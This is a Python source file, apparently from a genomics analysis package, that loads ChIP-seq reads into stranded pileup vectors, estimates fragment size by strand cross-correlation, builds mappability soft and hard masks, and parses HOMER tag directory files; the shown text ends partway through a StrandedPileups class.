def dbg_print(text, indent_level=0):
"""
Selective printer for status messages with optional indenting.
Will print message if global VERBOSE flag is true, and indents a number of tabs equal to <indent level>
:param text:
:param indent_level:
:return:
"""
if VERBOSE:
for line in text.split('\n'):
print(('\t' * indent_level + line))
def get_fragment_size_from_file(replicate_name):
# print('Checking for pre-computed fragment size for replicate {} ...'.format(replicate_name))
fragment_length = None
try:
with open(FRAGMENT_SIZES_FILENAME, 'rt') as fragment_size_file:
ss_reader = csv.reader(fragment_size_file, dialect=csv.excel_tab)
for line in ss_reader:
# print(line)
if line[0] == replicate_name:
fragment_length = int(line[1])
# print('Found pre-computed fragment size of {}'.format(fragment_length))
except IOError as ie:
print('No fragment size file found.')
else:
if fragment_length is None:
            print('No pre-computed fragment size found.')
return fragment_length
def get_fragment_size_from_homer(homer_tag_directory):
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
return fragment_length
def save_fragment_length(replicate_name, fragment_length):
print('Saving fragment size to {}'.format(FRAGMENT_SIZES_FILENAME))
with open(FRAGMENT_SIZES_FILENAME, 'a') as fragment_size_file:
ss_writer = csv.writer(fragment_size_file, dialect=csv.excel_tab)
ss_writer.writerow([replicate_name, str(fragment_length)])
def get_chrom_length_dict(genome_table_fname, dest_chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
print('Getting chromosome lengths from {} and translating names to dialect {}'.format(genome_table_fname, dest_chromosome_dialect))
with open(genome_table_fname, 'rt') as gt_file:
length_dict = {}
for line in gt_file:
# print line
split_line = re.split(r'\s', line.strip())
if len(split_line) > 1:
# print split_line[0], toolbox.parse_chromosome_ID(split_line[0])
length_dict[toolbox.convert_chroms(split_line[0], dest=dest_chromosome_dialect)] = int(split_line[1])
# length_dict[split_line[0].strip()] = int(split_line[1])
return length_dict
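# Illustrative sketch (added for clarity, not part of the original module): the
# same kind of two-column "<chrom> <length>" parsing that get_chrom_length_dict
# performs, shown on in-memory lines instead of a genome table file.
def _example_parse_genome_table_lines(lines):
    # e.g. ['chr1\t197195432', 'chr2\t181748087'] -> {'chr1': 197195432, 'chr2': 181748087}
    lengths = {}
    for line in lines:
        split_line = re.split(r'\s+', line.strip())
        if len(split_line) > 1:
            lengths[split_line[0]] = int(split_line[1])
    return lengths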
def load_stranded(chrom_lengths, data_filename, name, build, fragment_sizes_filename=FRAGMENT_SIZES_FILENAME,
strand_shift=-1, reads_dialect=DEFAULT_CHROMOSOME_DIALECT):
"""
Wrapper function to load a pileup stranded object from a set of reads and perform a strand-shifted mixdown.
This is just a kludgy hack in place of refactoring the StrandedPileups and Pileups classes to something more
sensible.
    :param chrom_lengths:
:param bed_filename:
:param name:
:param build:
:return:
"""
new_stranded = StrandedPileups(chrom_lengths=chrom_lengths, input_filename=data_filename, name=name, build=build,
chromosome_dialect=reads_dialect)
# check if pre-computed strand shift exists:
rep_path, rep_filename, rep_extension = toolbox.parse_path(data_filename)
if strand_shift == -1:
try:
with open(fragment_sizes_filename, 'rt') as ss_file:
ss_reader = csv.reader(ss_file, dialect=csv.excel_tab)
for line in ss_reader:
if line[0] == rep_filename:
strand_shift = int(line[1])
print(('Found pre-computed strand shift of {} for replicate {}'.format(strand_shift,
rep_filename)))
except IOError:
print('No strand shift file found.')
if strand_shift == -1:
print('No pre-computed strand shift found, computing now...')
strand_shift = new_stranded.estimateFragmentSize()
print('Saving strand shift to {}'.format(fragment_sizes_filename))
with open(fragment_sizes_filename, 'a') as ss_file:
ss_writer = csv.writer(ss_file, dialect=csv.excel_tab)
ss_writer.writerow([rep_filename, str(strand_shift)])
return new_stranded.mixDown(strand_shift)
def load_starts_only(chrom_lengths, input_filename, name, build, chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
"""
Wrapper function to load a pileup object from only the starts of reads (presumed fragment ends)
    :param chrom_lengths:
:param bed_filename:
:param name:
:param build:
:return:
"""
print('Generating pileup vector from read starts in {}'.format(input_filename))
new_stranded = StrandedPileups(chrom_lengths=chrom_lengths, name=name, build=build,
chromosome_dialect=chromosome_dialect)
new_stranded.loadFromBed(input_filename=input_filename, region_handling='starts', ignore_strandless=False)
return new_stranded.mixDown()
def load_soft_masked(config, chrom_lengths, name, build, input_filename, ref_genome_path,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, validate=False):
"""
Convenience function that:
1. Generates a stranded pileup vector from a readset file using the fragment extension method
2. Generates a soft mask for the given fragment length from a file of alignable start sites for the given read length.
3. Applies the soft mask while mixing down the stranded pileup vector to a single strand
4. Generates a hard mask from regions in the soft mask that are zero on both strands, representing areas with no possible
fragment density.
5. Returns both the unstranded, soft-masked, fragment pileup vector and the hard mask.
Now, will look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER having the name of the tagalign file.
:return:
"""
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, toolbox.parse_path(input_filename)[1] + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode='')
except (IOError, OSError):
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from {} using fragment extension method'.format(input_filename))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=config['GENOME_BUILD'],
chromosome_dialect=chromosome_dialect)
chip_starts.loadFromBed(input_filename=input_filename, region_handling='starts')
rep_path, rep_name, rep_extension = toolbox.parse_path(input_filename)
fragment_length = chip_starts.getFragmentSize(replicate_name=rep_name, save_plot_fname=os.path.join(rep_path,
'{}_fragment_size_cc'.format(
rep_name)))
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
soft_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER,
'{}_{}_soft_mask'.format(config['GENOME_BUILD'], read_length))
try:
print('Looking for pre-generated soft mask pileup in {}'.format(soft_mask_save_folder))
soft_mask=StrandedPileups.load(soft_mask_save_folder, mmap_mode='')
except (IOError, OSError) as ex:
print('Pre-generated soft mask not found. Generating . . .')
generate_soft_mask = True
else:
generate_soft_mask = False
if generate_soft_mask:
print()
print('Generating soft mask ...')
alignable_starts_filename = os.path.join(ref_genome_path,
'{}_start_regions_{}.bed'.format(config['GENOME_BUILD'], read_length))
if not os.path.isfile(alignable_starts_filename):
mappble_basepairs = pp_mappability.get_mappability(config, read_length, make_region_file=True)
soft_mask_starts = StrandedPileups(chrom_lengths=chrom_lengths,
name='{}_{}_soft_mask_starts'.format(config['GENOME_BUILD'], read_length),
build=config['GENOME_BUILD'],
chromosome_dialect=chromosome_dialect)
soft_mask_starts.loadFromBed(input_filename=alignable_starts_filename, ignore_strandless=True,
display_read_lengths=False)
soft_mask = soft_mask_starts.readStartsToSoftMask(read_length=read_length, fragment_length=fragment_length)
soft_mask.save(soft_mask_save_folder)
hard_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER,
'{}_{}_hard_mask'.format(config['GENOME_BUILD'], read_length))
try:
print('Looking for pre-generated hard mask pileup in {}'.format(hard_mask_save_folder))
hard_mask = Pileups.load(hard_mask_save_folder, mmap_mode='')
except (IOError, OSError) as ex:
print('Pre-generated hard mask not found. Generating . . .')
generate_hard_mask = True
else:
generate_hard_mask = False
if generate_hard_mask:
print()
print('Generating hard mask of unalignable regions ...')
hard_mask = soft_mask.mixDown().nonzero()
hard_mask.name = '{}_hard_mask'.format(read_length)
hard_mask.toType(numpy.bool)
hard_mask.save(hard_mask_save_folder)
if generate_data:
print()
stranded_chip.applySoftMask(soft_mask=soft_mask)
del soft_mask
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if validate:
print('Validating...')
to_use = numpy.nonzero(hard_mask.flatten())[0]
min_chip = unstranded_chip.flatten()[to_use].min()
max_chip = unstranded_chip.flatten()[to_use].max()
print(('Min value: {}, max value: {}'.format(min_chip, max_chip)))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip, hard_mask
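# Illustrative usage sketch (added for clarity, not part of the original module):
# the call pattern implied by the pipeline steps listed in load_soft_masked's
# docstring. The file names, paths and replicate name below are hypothetical
# placeholders, not values used elsewhere in this module.
def _example_load_soft_masked_usage(config, genome_table_fname, tagalign_fname, ref_genome_path):
    """ return (soft-masked unstranded pileup, hard mask) for one replicate """
    chrom_lengths = get_chrom_length_dict(genome_table_fname)
    return load_soft_masked(config, chrom_lengths,
                            name='example_replicate',
                            build=config['GENOME_BUILD'],
                            input_filename=tagalign_fname,
                            ref_genome_path=ref_genome_path)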
def homer_parse_taginfo(tag_info_filename):
"""
Extract information from HOMER's tagInfo.txt file in the tag directory.
Returns a dictionary consisting of the fields defined by the key-value pairs at the top of the file.
Note that the current format of the tagInfo file is a little wonky, seems to be a work in progress subject to
change down the road.
It's basically a 3-column TSV with the chromosome, unique positions, and total tags. But after the header,
and the global values, there's a set of lines with key-value pairs, then it gives the 3 columns for the
individual chromosomes.
Values useful for constructing a pileup: fragmentLengthEstimate, peakSizeEstimate, averageTagLength
"""
with open(tag_info_filename, 'rt') as tag_info_file:
info = {}
header = tag_info_file.readline()
assert header == 'name\tUnique Positions\tTotal Tags\n', 'Invalid header found: {}'.format(header)
global_values = tag_info_file.readline()
line = tag_info_file.readline()
# read the key value pairs
while '=' in line:
key, value = [x.strip() for x in line.strip().split('=')]
info[key] = toolbox.smart_convert(value)
line = tag_info_file.readline()
return info
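# Illustrative sketch (added for clarity, not part of the original module): the
# key=value section of tagInfo.txt parsed from in-memory lines. The real parser
# above additionally converts each value with toolbox.smart_convert; that step is
# skipped here to keep the example self-contained.
def _example_parse_taginfo_pairs(lines):
    # e.g. ['fragmentLengthEstimate=150', 'peakSizeEstimate=263'] ->
    #      {'fragmentLengthEstimate': '150', 'peakSizeEstimate': '263'}
    info = {}
    for line in lines:
        if '=' not in line:
            break
        key, value = [x.strip() for x in line.strip().split('=')]
        info[key] = value
    return info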
def homer_get_mode_tag_length(tag_length_distribution_filename):
"""
Parses HOMER's tagLengthDistribution.txt file and returns the mode (most common value) of the distribution
"""
tag_length_frequencies = []
with open(tag_length_distribution_filename) as tag_length_file:
tag_length_file.readline()
tag_length_frequencies = []
for line in tag_length_file:
split_line = line.split('\t')
tag_length_frequencies.append((int(split_line[0]), float(split_line[1])))
return sorted(tag_length_frequencies, key=lambda x: x[1])[-1][0]
def load_soft_masked_from_homer(config, chrom_lengths, name, build, homer_tag_directory,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, conservative_hard_mask=False,
mem_map_mode='r',
validate=False, disable_soft_mask=False, max_clonality=1.0):
"""
Convenience function that:
1. Generates a stranded pileup vector from a readset file using the fragment extension method
2. Generates a soft mask for the given fragment length from a file of alignable start sites for the given read length.
3. Applies the soft mask while mixing down the stranded pileup vector to a single strand
4. Generates a hard mask from regions in the soft mask that are zero on both strands, representing areas with no possible
fragment density.
5. Returns both the unstranded, soft-masked, fragment pileup vector and the hard mask.
Now, will look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER having the name of the tagalign file.
:return:
"""
rep_name = homer_tag_directory.strip('/').split(os.path.sep)[-1]
if rep_name.endswith('/'): rep_name = rep_name[:-1]
print('Rep name: {}'.format(rep_name))
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, rep_name + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
need_soft_mask = False
generate_soft_mask = False
generate_hard_mask = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from HOMER tag folder {} using fragment extension method'.format(
homer_tag_directory))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=build,
chromosome_dialect=chromosome_dialect)
chip_starts.load_from_homer_tag_directory(input_filename=homer_tag_directory, region_handling='starts')
chip_starts.mode_read_length = homer_get_mode_tag_length(
os.path.join(homer_tag_directory, 'tagLengthDistribution.txt'))
if max_clonality is not None:
print('Filtering to allow maximum {} reads at each locus ...'.format(max_clonality))
for chrom in chip_starts.spileups:
for strand in chip_starts.spileups[chrom]:
chip_starts.spileups[chrom][strand] = numpy.clip(chip_starts.spileups[chrom][strand], a_min=0, a_max=max_clonality)
fragment_length = get_fragment_size_from_file(rep_name)
if not fragment_length:
# get fragment size from homer
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
save_fragment_length(rep_name, fragment_length)
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
need_soft_mask = True
else:
fragment_length = get_fragment_size_from_file(rep_name)
hard_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER, '{}_{}_{}{}_hard_mask'.format(build, read_length, fragment_length,
['', '_conservative'][
conservative_hard_mask]))
try:
print('Looking for pre-generated hard mask pileup in {}'.format(hard_mask_save_folder))
hard_mask = Pileups.load(hard_mask_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated hard mask not found.')
generate_hard_mask = True
need_soft_mask = True
if need_soft_mask:
soft_mask_save_folder = os.path.join(PILEUP_DATA_FOLDER, '{}_{}_{}_soft_mask'.format(build, read_length, fragment_length))
try:
print('Looking for pre-generated soft mask pileup in {}'.format(soft_mask_save_folder))
soft_mask = StrandedPileups.load(soft_mask_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated soft mask not found.')
generate_soft_mask = True
if generate_soft_mask:
print()
print('Generating soft mask ...')
ref_genome_path=toolbox.parse_path(config['REFERENCE_GENOME_PATH'])[0]
alignable_starts_filename = os.path.join(ref_genome_path,
'{}_start_regions_{}.bed'.format(build, read_length))
if not os.path.isfile(alignable_starts_filename):
mappble_basepairs = pp_mappability.get_mappability(config, read_length, make_region_file=True)
soft_mask_starts = StrandedPileups(chrom_lengths=chrom_lengths,
name='{}_{}_soft_mask_starts'.format(build, read_length),
build=build,
chromosome_dialect=chromosome_dialect)
soft_mask_starts.loadFromBed(input_filename=alignable_starts_filename, ignore_strandless=True,
display_read_lengths=False)
soft_mask = soft_mask_starts.readStartsToSoftMask(read_length=read_length, fragment_length=fragment_length)
soft_mask.save(soft_mask_save_folder)
if mem_map_mode == 'rw':
soft_mask.memMap(writable=True)
elif mem_map_mode == 'r':
soft_mask.memMap(writable=False)
if generate_hard_mask:
print()
print('Generating hard mask of unalignable regions ...')
if conservative_hard_mask:
print('\tUsing conservative approach (excluding all regions impacted by mappability)...')
hard_mask = soft_mask.mixDown().threshold(min_value=1.999)
else:
print(
'\tUsing permissive approach (excluding only regions that are totally unable to receive fragments because of mappability)')
hard_mask = soft_mask.mixDown().nonzero()
hard_mask.name = '{}_hard_mask'.format(read_length)
hard_mask.toType(numpy.bool)
hard_mask.save(hard_mask_save_folder)
if mem_map_mode == 'rw':
hard_mask.memMap(writable=True)
elif mem_map_mode == 'r':
hard_mask.memMap(writable=False)
if generate_data:
print()
if disable_soft_mask:
print('Soft mask application DISABLED')
else:
# print('Applying soft mask ...')
stranded_chip.applySoftMask(soft_mask=soft_mask)
del soft_mask
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if mem_map_mode == 'rw':
unstranded_chip.memMap(writable=True)
elif mem_map_mode == 'r':
unstranded_chip.memMap(writable=False)
if validate:
print('Validating...')
to_use = numpy.nonzero(hard_mask.flatten())[0]
min_chip = unstranded_chip.flatten()[to_use].min()
max_chip = unstranded_chip.flatten()[to_use].max()
print('Min value: {}, max value: {}'.format(min_chip, max_chip))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should be <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip, hard_mask
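# Hypothetical usage sketch for the loader above (argument values are illustrative, not taken from
# a real configuration):
#     chip_pileup, hard_mask = load_soft_masked_from_homer(
#         config, chrom_lengths, name='sample_rep1', build='hg19',
#         homer_tag_directory='/path/to/homer_tagdir', validate=True)
# <chip_pileup> is the soft-masked, unstranded fragment pileup; <hard_mask> is a boolean pileup
# marking positions that can receive fragment density at all (used to exclude unalignable regions).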
def load_soft_masked_from_homer_nomask(config, chrom_lengths, name, build, homer_tag_directory,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT,
mem_map_mode='r', max_clonality=1.0,
validate=False):
"""
Convenience function that:
1. Generates a stranded pileup vector from a HOMER tag directory using the fragment extension method
2. Returns the unstranded fragment pileup vector (no soft or hard masking is applied).
Will first look for a pre-saved pileup data folder in a subfolder of PILEUP_DATA_FOLDER named after the HOMER tag directory.
:return:
"""
rep_name = homer_tag_directory.strip('/').split(os.path.sep)[-1]
if rep_name.endswith('/'): rep_name = rep_name[:-1]
print('Rep name: {}'.format(rep_name))
data_save_folder = os.path.join(PILEUP_DATA_FOLDER, rep_name + '_data')
toolbox.establish_path(PILEUP_DATA_FOLDER)
overall_load_start_time = datetime.datetime.now()
print('Looking for pre-generated data pileup in {}'.format(data_save_folder))
generate_data = False
try:
unstranded_chip = Pileups.load(data_save_folder, mmap_mode=mem_map_mode)
except (IOError, OSError) as ex:
print('Pre-generated data not found. Will generate now.')
generate_data = True
else:
read_length = unstranded_chip.mode_read_length
if generate_data:
print()
print('Generating pileup vector from HOMER tag folder {} using fragment extension method'.format(
homer_tag_directory))
chip_starts = StrandedPileups(chrom_lengths=chrom_lengths, name='{}_starts'.format(name),
build=build,
chromosome_dialect=chromosome_dialect)
chip_starts.load_from_homer_tag_directory(input_filename=homer_tag_directory, region_handling='starts')
chip_starts.mode_read_length = homer_get_mode_tag_length(
os.path.join(homer_tag_directory, 'tagLengthDistribution.txt'))
if max_clonality > 0:
print('Filtering to allow maximum {} reads at each locus ...'.format(max_clonality))
for chrom in chip_starts.spileups:
for strand in chip_starts.spileups[chrom]:
chip_starts.spileups[chrom][strand] = numpy.clip(chip_starts.spileups[chrom][strand], a_min=0, a_max=max_clonality)
fragment_length = get_fragment_size_from_file(rep_name)
if not fragment_length:
# get fragment size from homer
homer_info = homer_parse_taginfo(os.path.join(homer_tag_directory, 'tagInfo.txt'))
fragment_length = homer_info['fragmentLengthEstimate']
save_fragment_length(rep_name, fragment_length)
print()
print('Extending data reads to fragments of size {} ...'.format(fragment_length))
stranded_chip = chip_starts.fragExtend(fragment_length)
read_length = chip_starts.mode_read_length # grab this number before we delete the whole thing
del chip_starts
else:
fragment_length = get_fragment_size_from_file(rep_name)
if generate_data:
print()
print('Mixing down stranded ChIP pileups to single-stranded...')
unstranded_chip = stranded_chip.mixDown()
del stranded_chip
unstranded_chip.toType(PILEUP_DTYPE)
print()
print('All done loading {} in {}'.format(unstranded_chip.name,
datetime.datetime.now() - overall_load_start_time))
unstranded_chip.save(data_save_folder)
if mem_map_mode == 'rw':
unstranded_chip.memMap(writable=True)
elif mem_map_mode == 'r':
unstranded_chip.memMap(writable=False)
if validate:
print('Validating...')
# this no-mask variant has no hard mask, so validate over the whole flattened pileup
flat_chip = unstranded_chip.flatten()
min_chip = flat_chip.min()
max_chip = flat_chip.max()
print('Min value: {}, max value: {}'.format(min_chip, max_chip))
if max_chip > fragment_length * 2:
raise Exception(
'Invalid maximum pileup height {} in {}, should be <= 2 * fragment size of {}'.format(max_chip,
unstranded_chip.name,
fragment_length))
print('Loaded successfully in {}.'.format(datetime.datetime.now() - overall_load_start_time))
return unstranded_chip
def frag_extend_chromslave(params):
"""
Used to extend stranded chromosomes in a multi-process manner.
"""
chrom_start_time = datetime.datetime.now()
chrom, read_starts, frag_length = params
dbg_print('Extending chromosome {}...'.format(chrom), 1)
neg_strand, pos_strand = read_starts
# copy and convert to float64 for optimal speed
neg_strand = neg_strand.astype(numpy.float64)
pos_strand = pos_strand.astype(numpy.float64)
extended_strands = [neg_strand.copy(), pos_strand.copy()]
for i in range(1, frag_length):
extended_strands[0][:-i] += neg_strand[i:]
extended_strands[1][i:] += pos_strand[:-i]
dbg_print('Done extending chromosome {} in {}'.format(chrom, datetime.datetime.now() - chrom_start_time), 1)
return chrom, extended_strands
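# The chromslave above extends read starts into fragments with a shift-and-add loop. The following
# small, self-contained sketch (illustrative only, never called by the pipeline) shows the same idea
# for the positive strand on a toy vector, assuming only that numpy is available.
def _example_positive_strand_frag_extend(frag_length=3):
    """Toy demonstration of fragment extension by shift-and-add on the positive strand."""
    import numpy
    starts = numpy.array([0, 1, 0, 0, 2, 0, 0, 0], dtype=numpy.float64)
    extended = starts.copy()  # offset 0: the start positions themselves
    for i in range(1, frag_length):
        # every start also contributes coverage to the i-th position downstream
        extended[i:] += starts[:-i]
    # with frag_length=3: extended == [0, 1, 1, 1, 2, 2, 2, 0]
    return extended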
def binding_energy_chromslave(params):
chrom, sequence_vector, motif = params
# print 'Chrom: {}, motif: {}'.format(chrom, motif)
# print 'Sequence vector: {} {}'.format(sequence_vector.shape, sequence_vector[:10])
# return chrom, (motifs.scan_pwm(sequence_vector[::-1], motif)[::-1], motifs.scan_pwm(sequence_vector, motif))
return chrom, (
motifs.scan_pwm(sequence_vector, motifs.motif_rev_complement(motif)), motifs.scan_pwm(sequence_vector, motif))
def soft_mask_generate_chromslave(params, check_empty=False):
this_chrom_start_time = datetime.datetime.now()
chrom, fragment_starts, read_length, fragment_length = params
# <fragment_starts> is a single per-chromosome vector of positive-strand start counts;
# convert the whole array (rather than element by element) to float64 for the shift-and-add below
if fragment_starts.dtype != numpy.float64:
    fragment_starts = fragment_starts.astype(numpy.float64)
# first check if chromosome is empty
if not check_empty or numpy.abs(fragment_starts).sum() > 0:
dbg_print('Processing chromosome {} ({} bp)...'.format(chrom, len(fragment_starts)), 1)
soft_mask = {}
# positive strand
soft_mask[1] = fragment_starts.copy() # account for fragment starts (offset 0)
# progressively shift and add the start sites up to <fragment_length> to effectively extend the fragments
for offset in range(1, fragment_length):
soft_mask[1][offset:] += fragment_starts[:-offset]
soft_mask[1] /= float(fragment_length)
# negative strand is an image of the positive strand offset by fragment_size + read_length
soft_mask[-1] = numpy.zeros(len(fragment_starts))
soft_mask[-1][:-fragment_length + read_length] = soft_mask[1][
fragment_length - read_length:]
dbg_print('Done with chromosome {} in {}'.format(chrom, datetime.datetime.now() - this_chrom_start_time), 1)
else:
# if empty, soft mask is all zeroes for that chromosome
dbg_print('Chromosome {} is empty, skipping...'.format(chrom), 1)
soft_mask = {1: numpy.zeros(len(fragment_starts)), -1: numpy.zeros(len(fragment_starts))}
return chrom, (soft_mask[-1], soft_mask[1])
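# A hedged sketch of what the soft mask represents: for each genomic position, the fraction of the
# <fragment_length> candidate fragment placements covering it whose start site is alignable. This toy
# helper (illustrative only, not used by the pipeline) mirrors the positive-strand computation in
# soft_mask_generate_chromslave above on a small vector.
def _example_soft_mask_positive_strand(fragment_length=4):
    """Toy demonstration of the positive-strand soft mask computation."""
    import numpy
    # 1.0 where a read could have been aligned (alignable start), 0.0 where it could not
    alignable_starts = numpy.array([1, 1, 0, 1, 1, 1, 0, 0], dtype=numpy.float64)
    soft_mask_pos = alignable_starts.copy()
    for offset in range(1, fragment_length):
        soft_mask_pos[offset:] += alignable_starts[:-offset]
    soft_mask_pos /= float(fragment_length)
    # each value is the fraction of alignable fragment starts within <fragment_length> bp upstream
    return soft_mask_pos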
def cross_correlate_chromslave(params, check_empty=True):
start_time = datetime.datetime.now()
chrom, chunk_idx, chrom_strands = params
neg_strand, pos_strand = chrom_strands
del chrom_strands
if neg_strand.dtype != numpy.float64:
neg_strand = neg_strand.astype(numpy.float64)
if pos_strand.dtype != numpy.float64:
pos_strand = pos_strand.astype(numpy.float64)
# del chrom_strands
if (numpy.abs(neg_strand).sum() > 0 and numpy.abs(pos_strand).sum() > 0) or not check_empty:
dbg_print('Cross-correlating chunk {} of chromosome {} ...'.format(chunk_idx, chrom), 1)
cc = scipy.signal.fftconvolve(neg_strand, pos_strand[::-1], mode='same')
dbg_print('Done cross-correlating chunk {} of chromosome {} in {}'.format(chunk_idx, chrom,
datetime.datetime.now() - start_time),
1)
else:
dbg_print('Chromosome {} is empty, skipping...'.format(chrom), 1)
cc = numpy.zeros(len(neg_strand))
# cc = toolbox.replace_with_mem_map(cc, read_only=True, tmp_dir=LOCAL_TMP_DIR)
return chrom, chunk_idx, cc
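# The fragment-size estimation in StrandedPileups.estimateFragmentSize below relies on the fact that
# convolving one strand with the reversed other strand (scipy.signal.fftconvolve with mode='same')
# yields a cross-correlation whose peak, measured from the vector midpoint, equals the strand shift.
# A minimal sketch on synthetic data (positions and the shift value are arbitrary):
def _example_strand_shift_by_cross_correlation():
    """Toy demonstration of recovering a known strand shift from the cross-correlation peak."""
    import numpy
    import scipy.signal
    n = 200
    true_shift = 30  # pretend the negative-strand peaks lag the positive-strand peaks by 30 bp
    pos_strand = numpy.zeros(n)
    neg_strand = numpy.zeros(n)
    for peak in (50, 120):
        pos_strand[peak] = 1.0
        neg_strand[peak + true_shift] = 1.0
    cc = scipy.signal.fftconvolve(neg_strand, pos_strand[::-1], mode='same')
    estimated_shift = int(numpy.argmax(cc)) - n // 2
    return estimated_shift  # equals true_shift (30) for this toy input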
class StrandedPileups(object):
def __init__(self, chrom_lengths={}, input_filename='', name='', build='',
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT, pileup_dtype=PILEUP_DTYPE):
self.id = toolbox.random_identifier(32)
self.pileup_dtype = pileup_dtype
self.save_path = None
self.name = name
self.build = build
self.spileups = {}
self.chrom_lengths = {}
# self.genome_size = -1
self.read_counts = {}
self.chromosome_dialect = chromosome_dialect
for chrom in chrom_lengths:
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.chrom_lengths[translated_chrom] = chrom_lengths[chrom]
self.spileups[translated_chrom] = {}
self.spileups[translated_chrom][-1] = numpy.zeros(chrom_lengths[chrom],
dtype=self.pileup_dtype) # negative strand
self.spileups[translated_chrom][1] = numpy.zeros(chrom_lengths[chrom],
dtype=self.pileup_dtype) # positive strand
self.read_counts[translated_chrom] = 0
# self.genome_size += chrom_lengths[chrom]
self.is_normalized = False
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.fragment_size = -1
self.mean_read_length = -1
self.mode_read_length = -1
# self.max_height = -1
self.input_filename = input_filename
print(('Initialized new stranded pileup object: {}, genome build: {}, chromosome dialect: {}'.format(self.name,
self.build,
self.chromosome_dialect)))
# print 'Initialized with chromosomes {} in length dict; {} in pileups'.format(', '.join(sorted(list(self.chrom_lengths.keys()))), ', '.join(sorted(list(self.spileups.keys()))))
if self.input_filename:
if input_filename.endswith('.bwtout.txt'):
self.loadFromBowtie(input_filename)
else:
self.loadFromBed(input_filename)
@property
def genome_size(self):
return sum(self.chrom_lengths.values())
def __del__(self):
if self.save_path and os.path.exists(self.save_path):
try:
shutil.rmtree(self.save_path)
except (OSError, IOError) as ex:
print(('Tried to delete {} but caught {} instead'.format(self.save_path, ex)))
def __iadd__(self, other):
try:
assert self.build == other.build
self.name = '({}+{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] += other.spileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}+{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.add(self.spileups[chrom][strand], other)
return self
def __isub__(self, other):
try:
assert self.build == other.build
self.name = '({}-{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] -= other.spileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}-{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.subtract(self.spileups[chrom][strand], other)
return self
def __imul__(self, other):
try:
assert self.build == other.build
self.name = '({}*{})'.format(self.name, other.name)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
assert len(self.spileups[chrom][strand]) == len(other.spileups[chrom][strand])
self.spileups[chrom][strand] *= other.spileups[chrom][strand]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}*{})'.format(self.name, other)
for chrom in self.spileups:
for strand in self.spileups[chrom]:
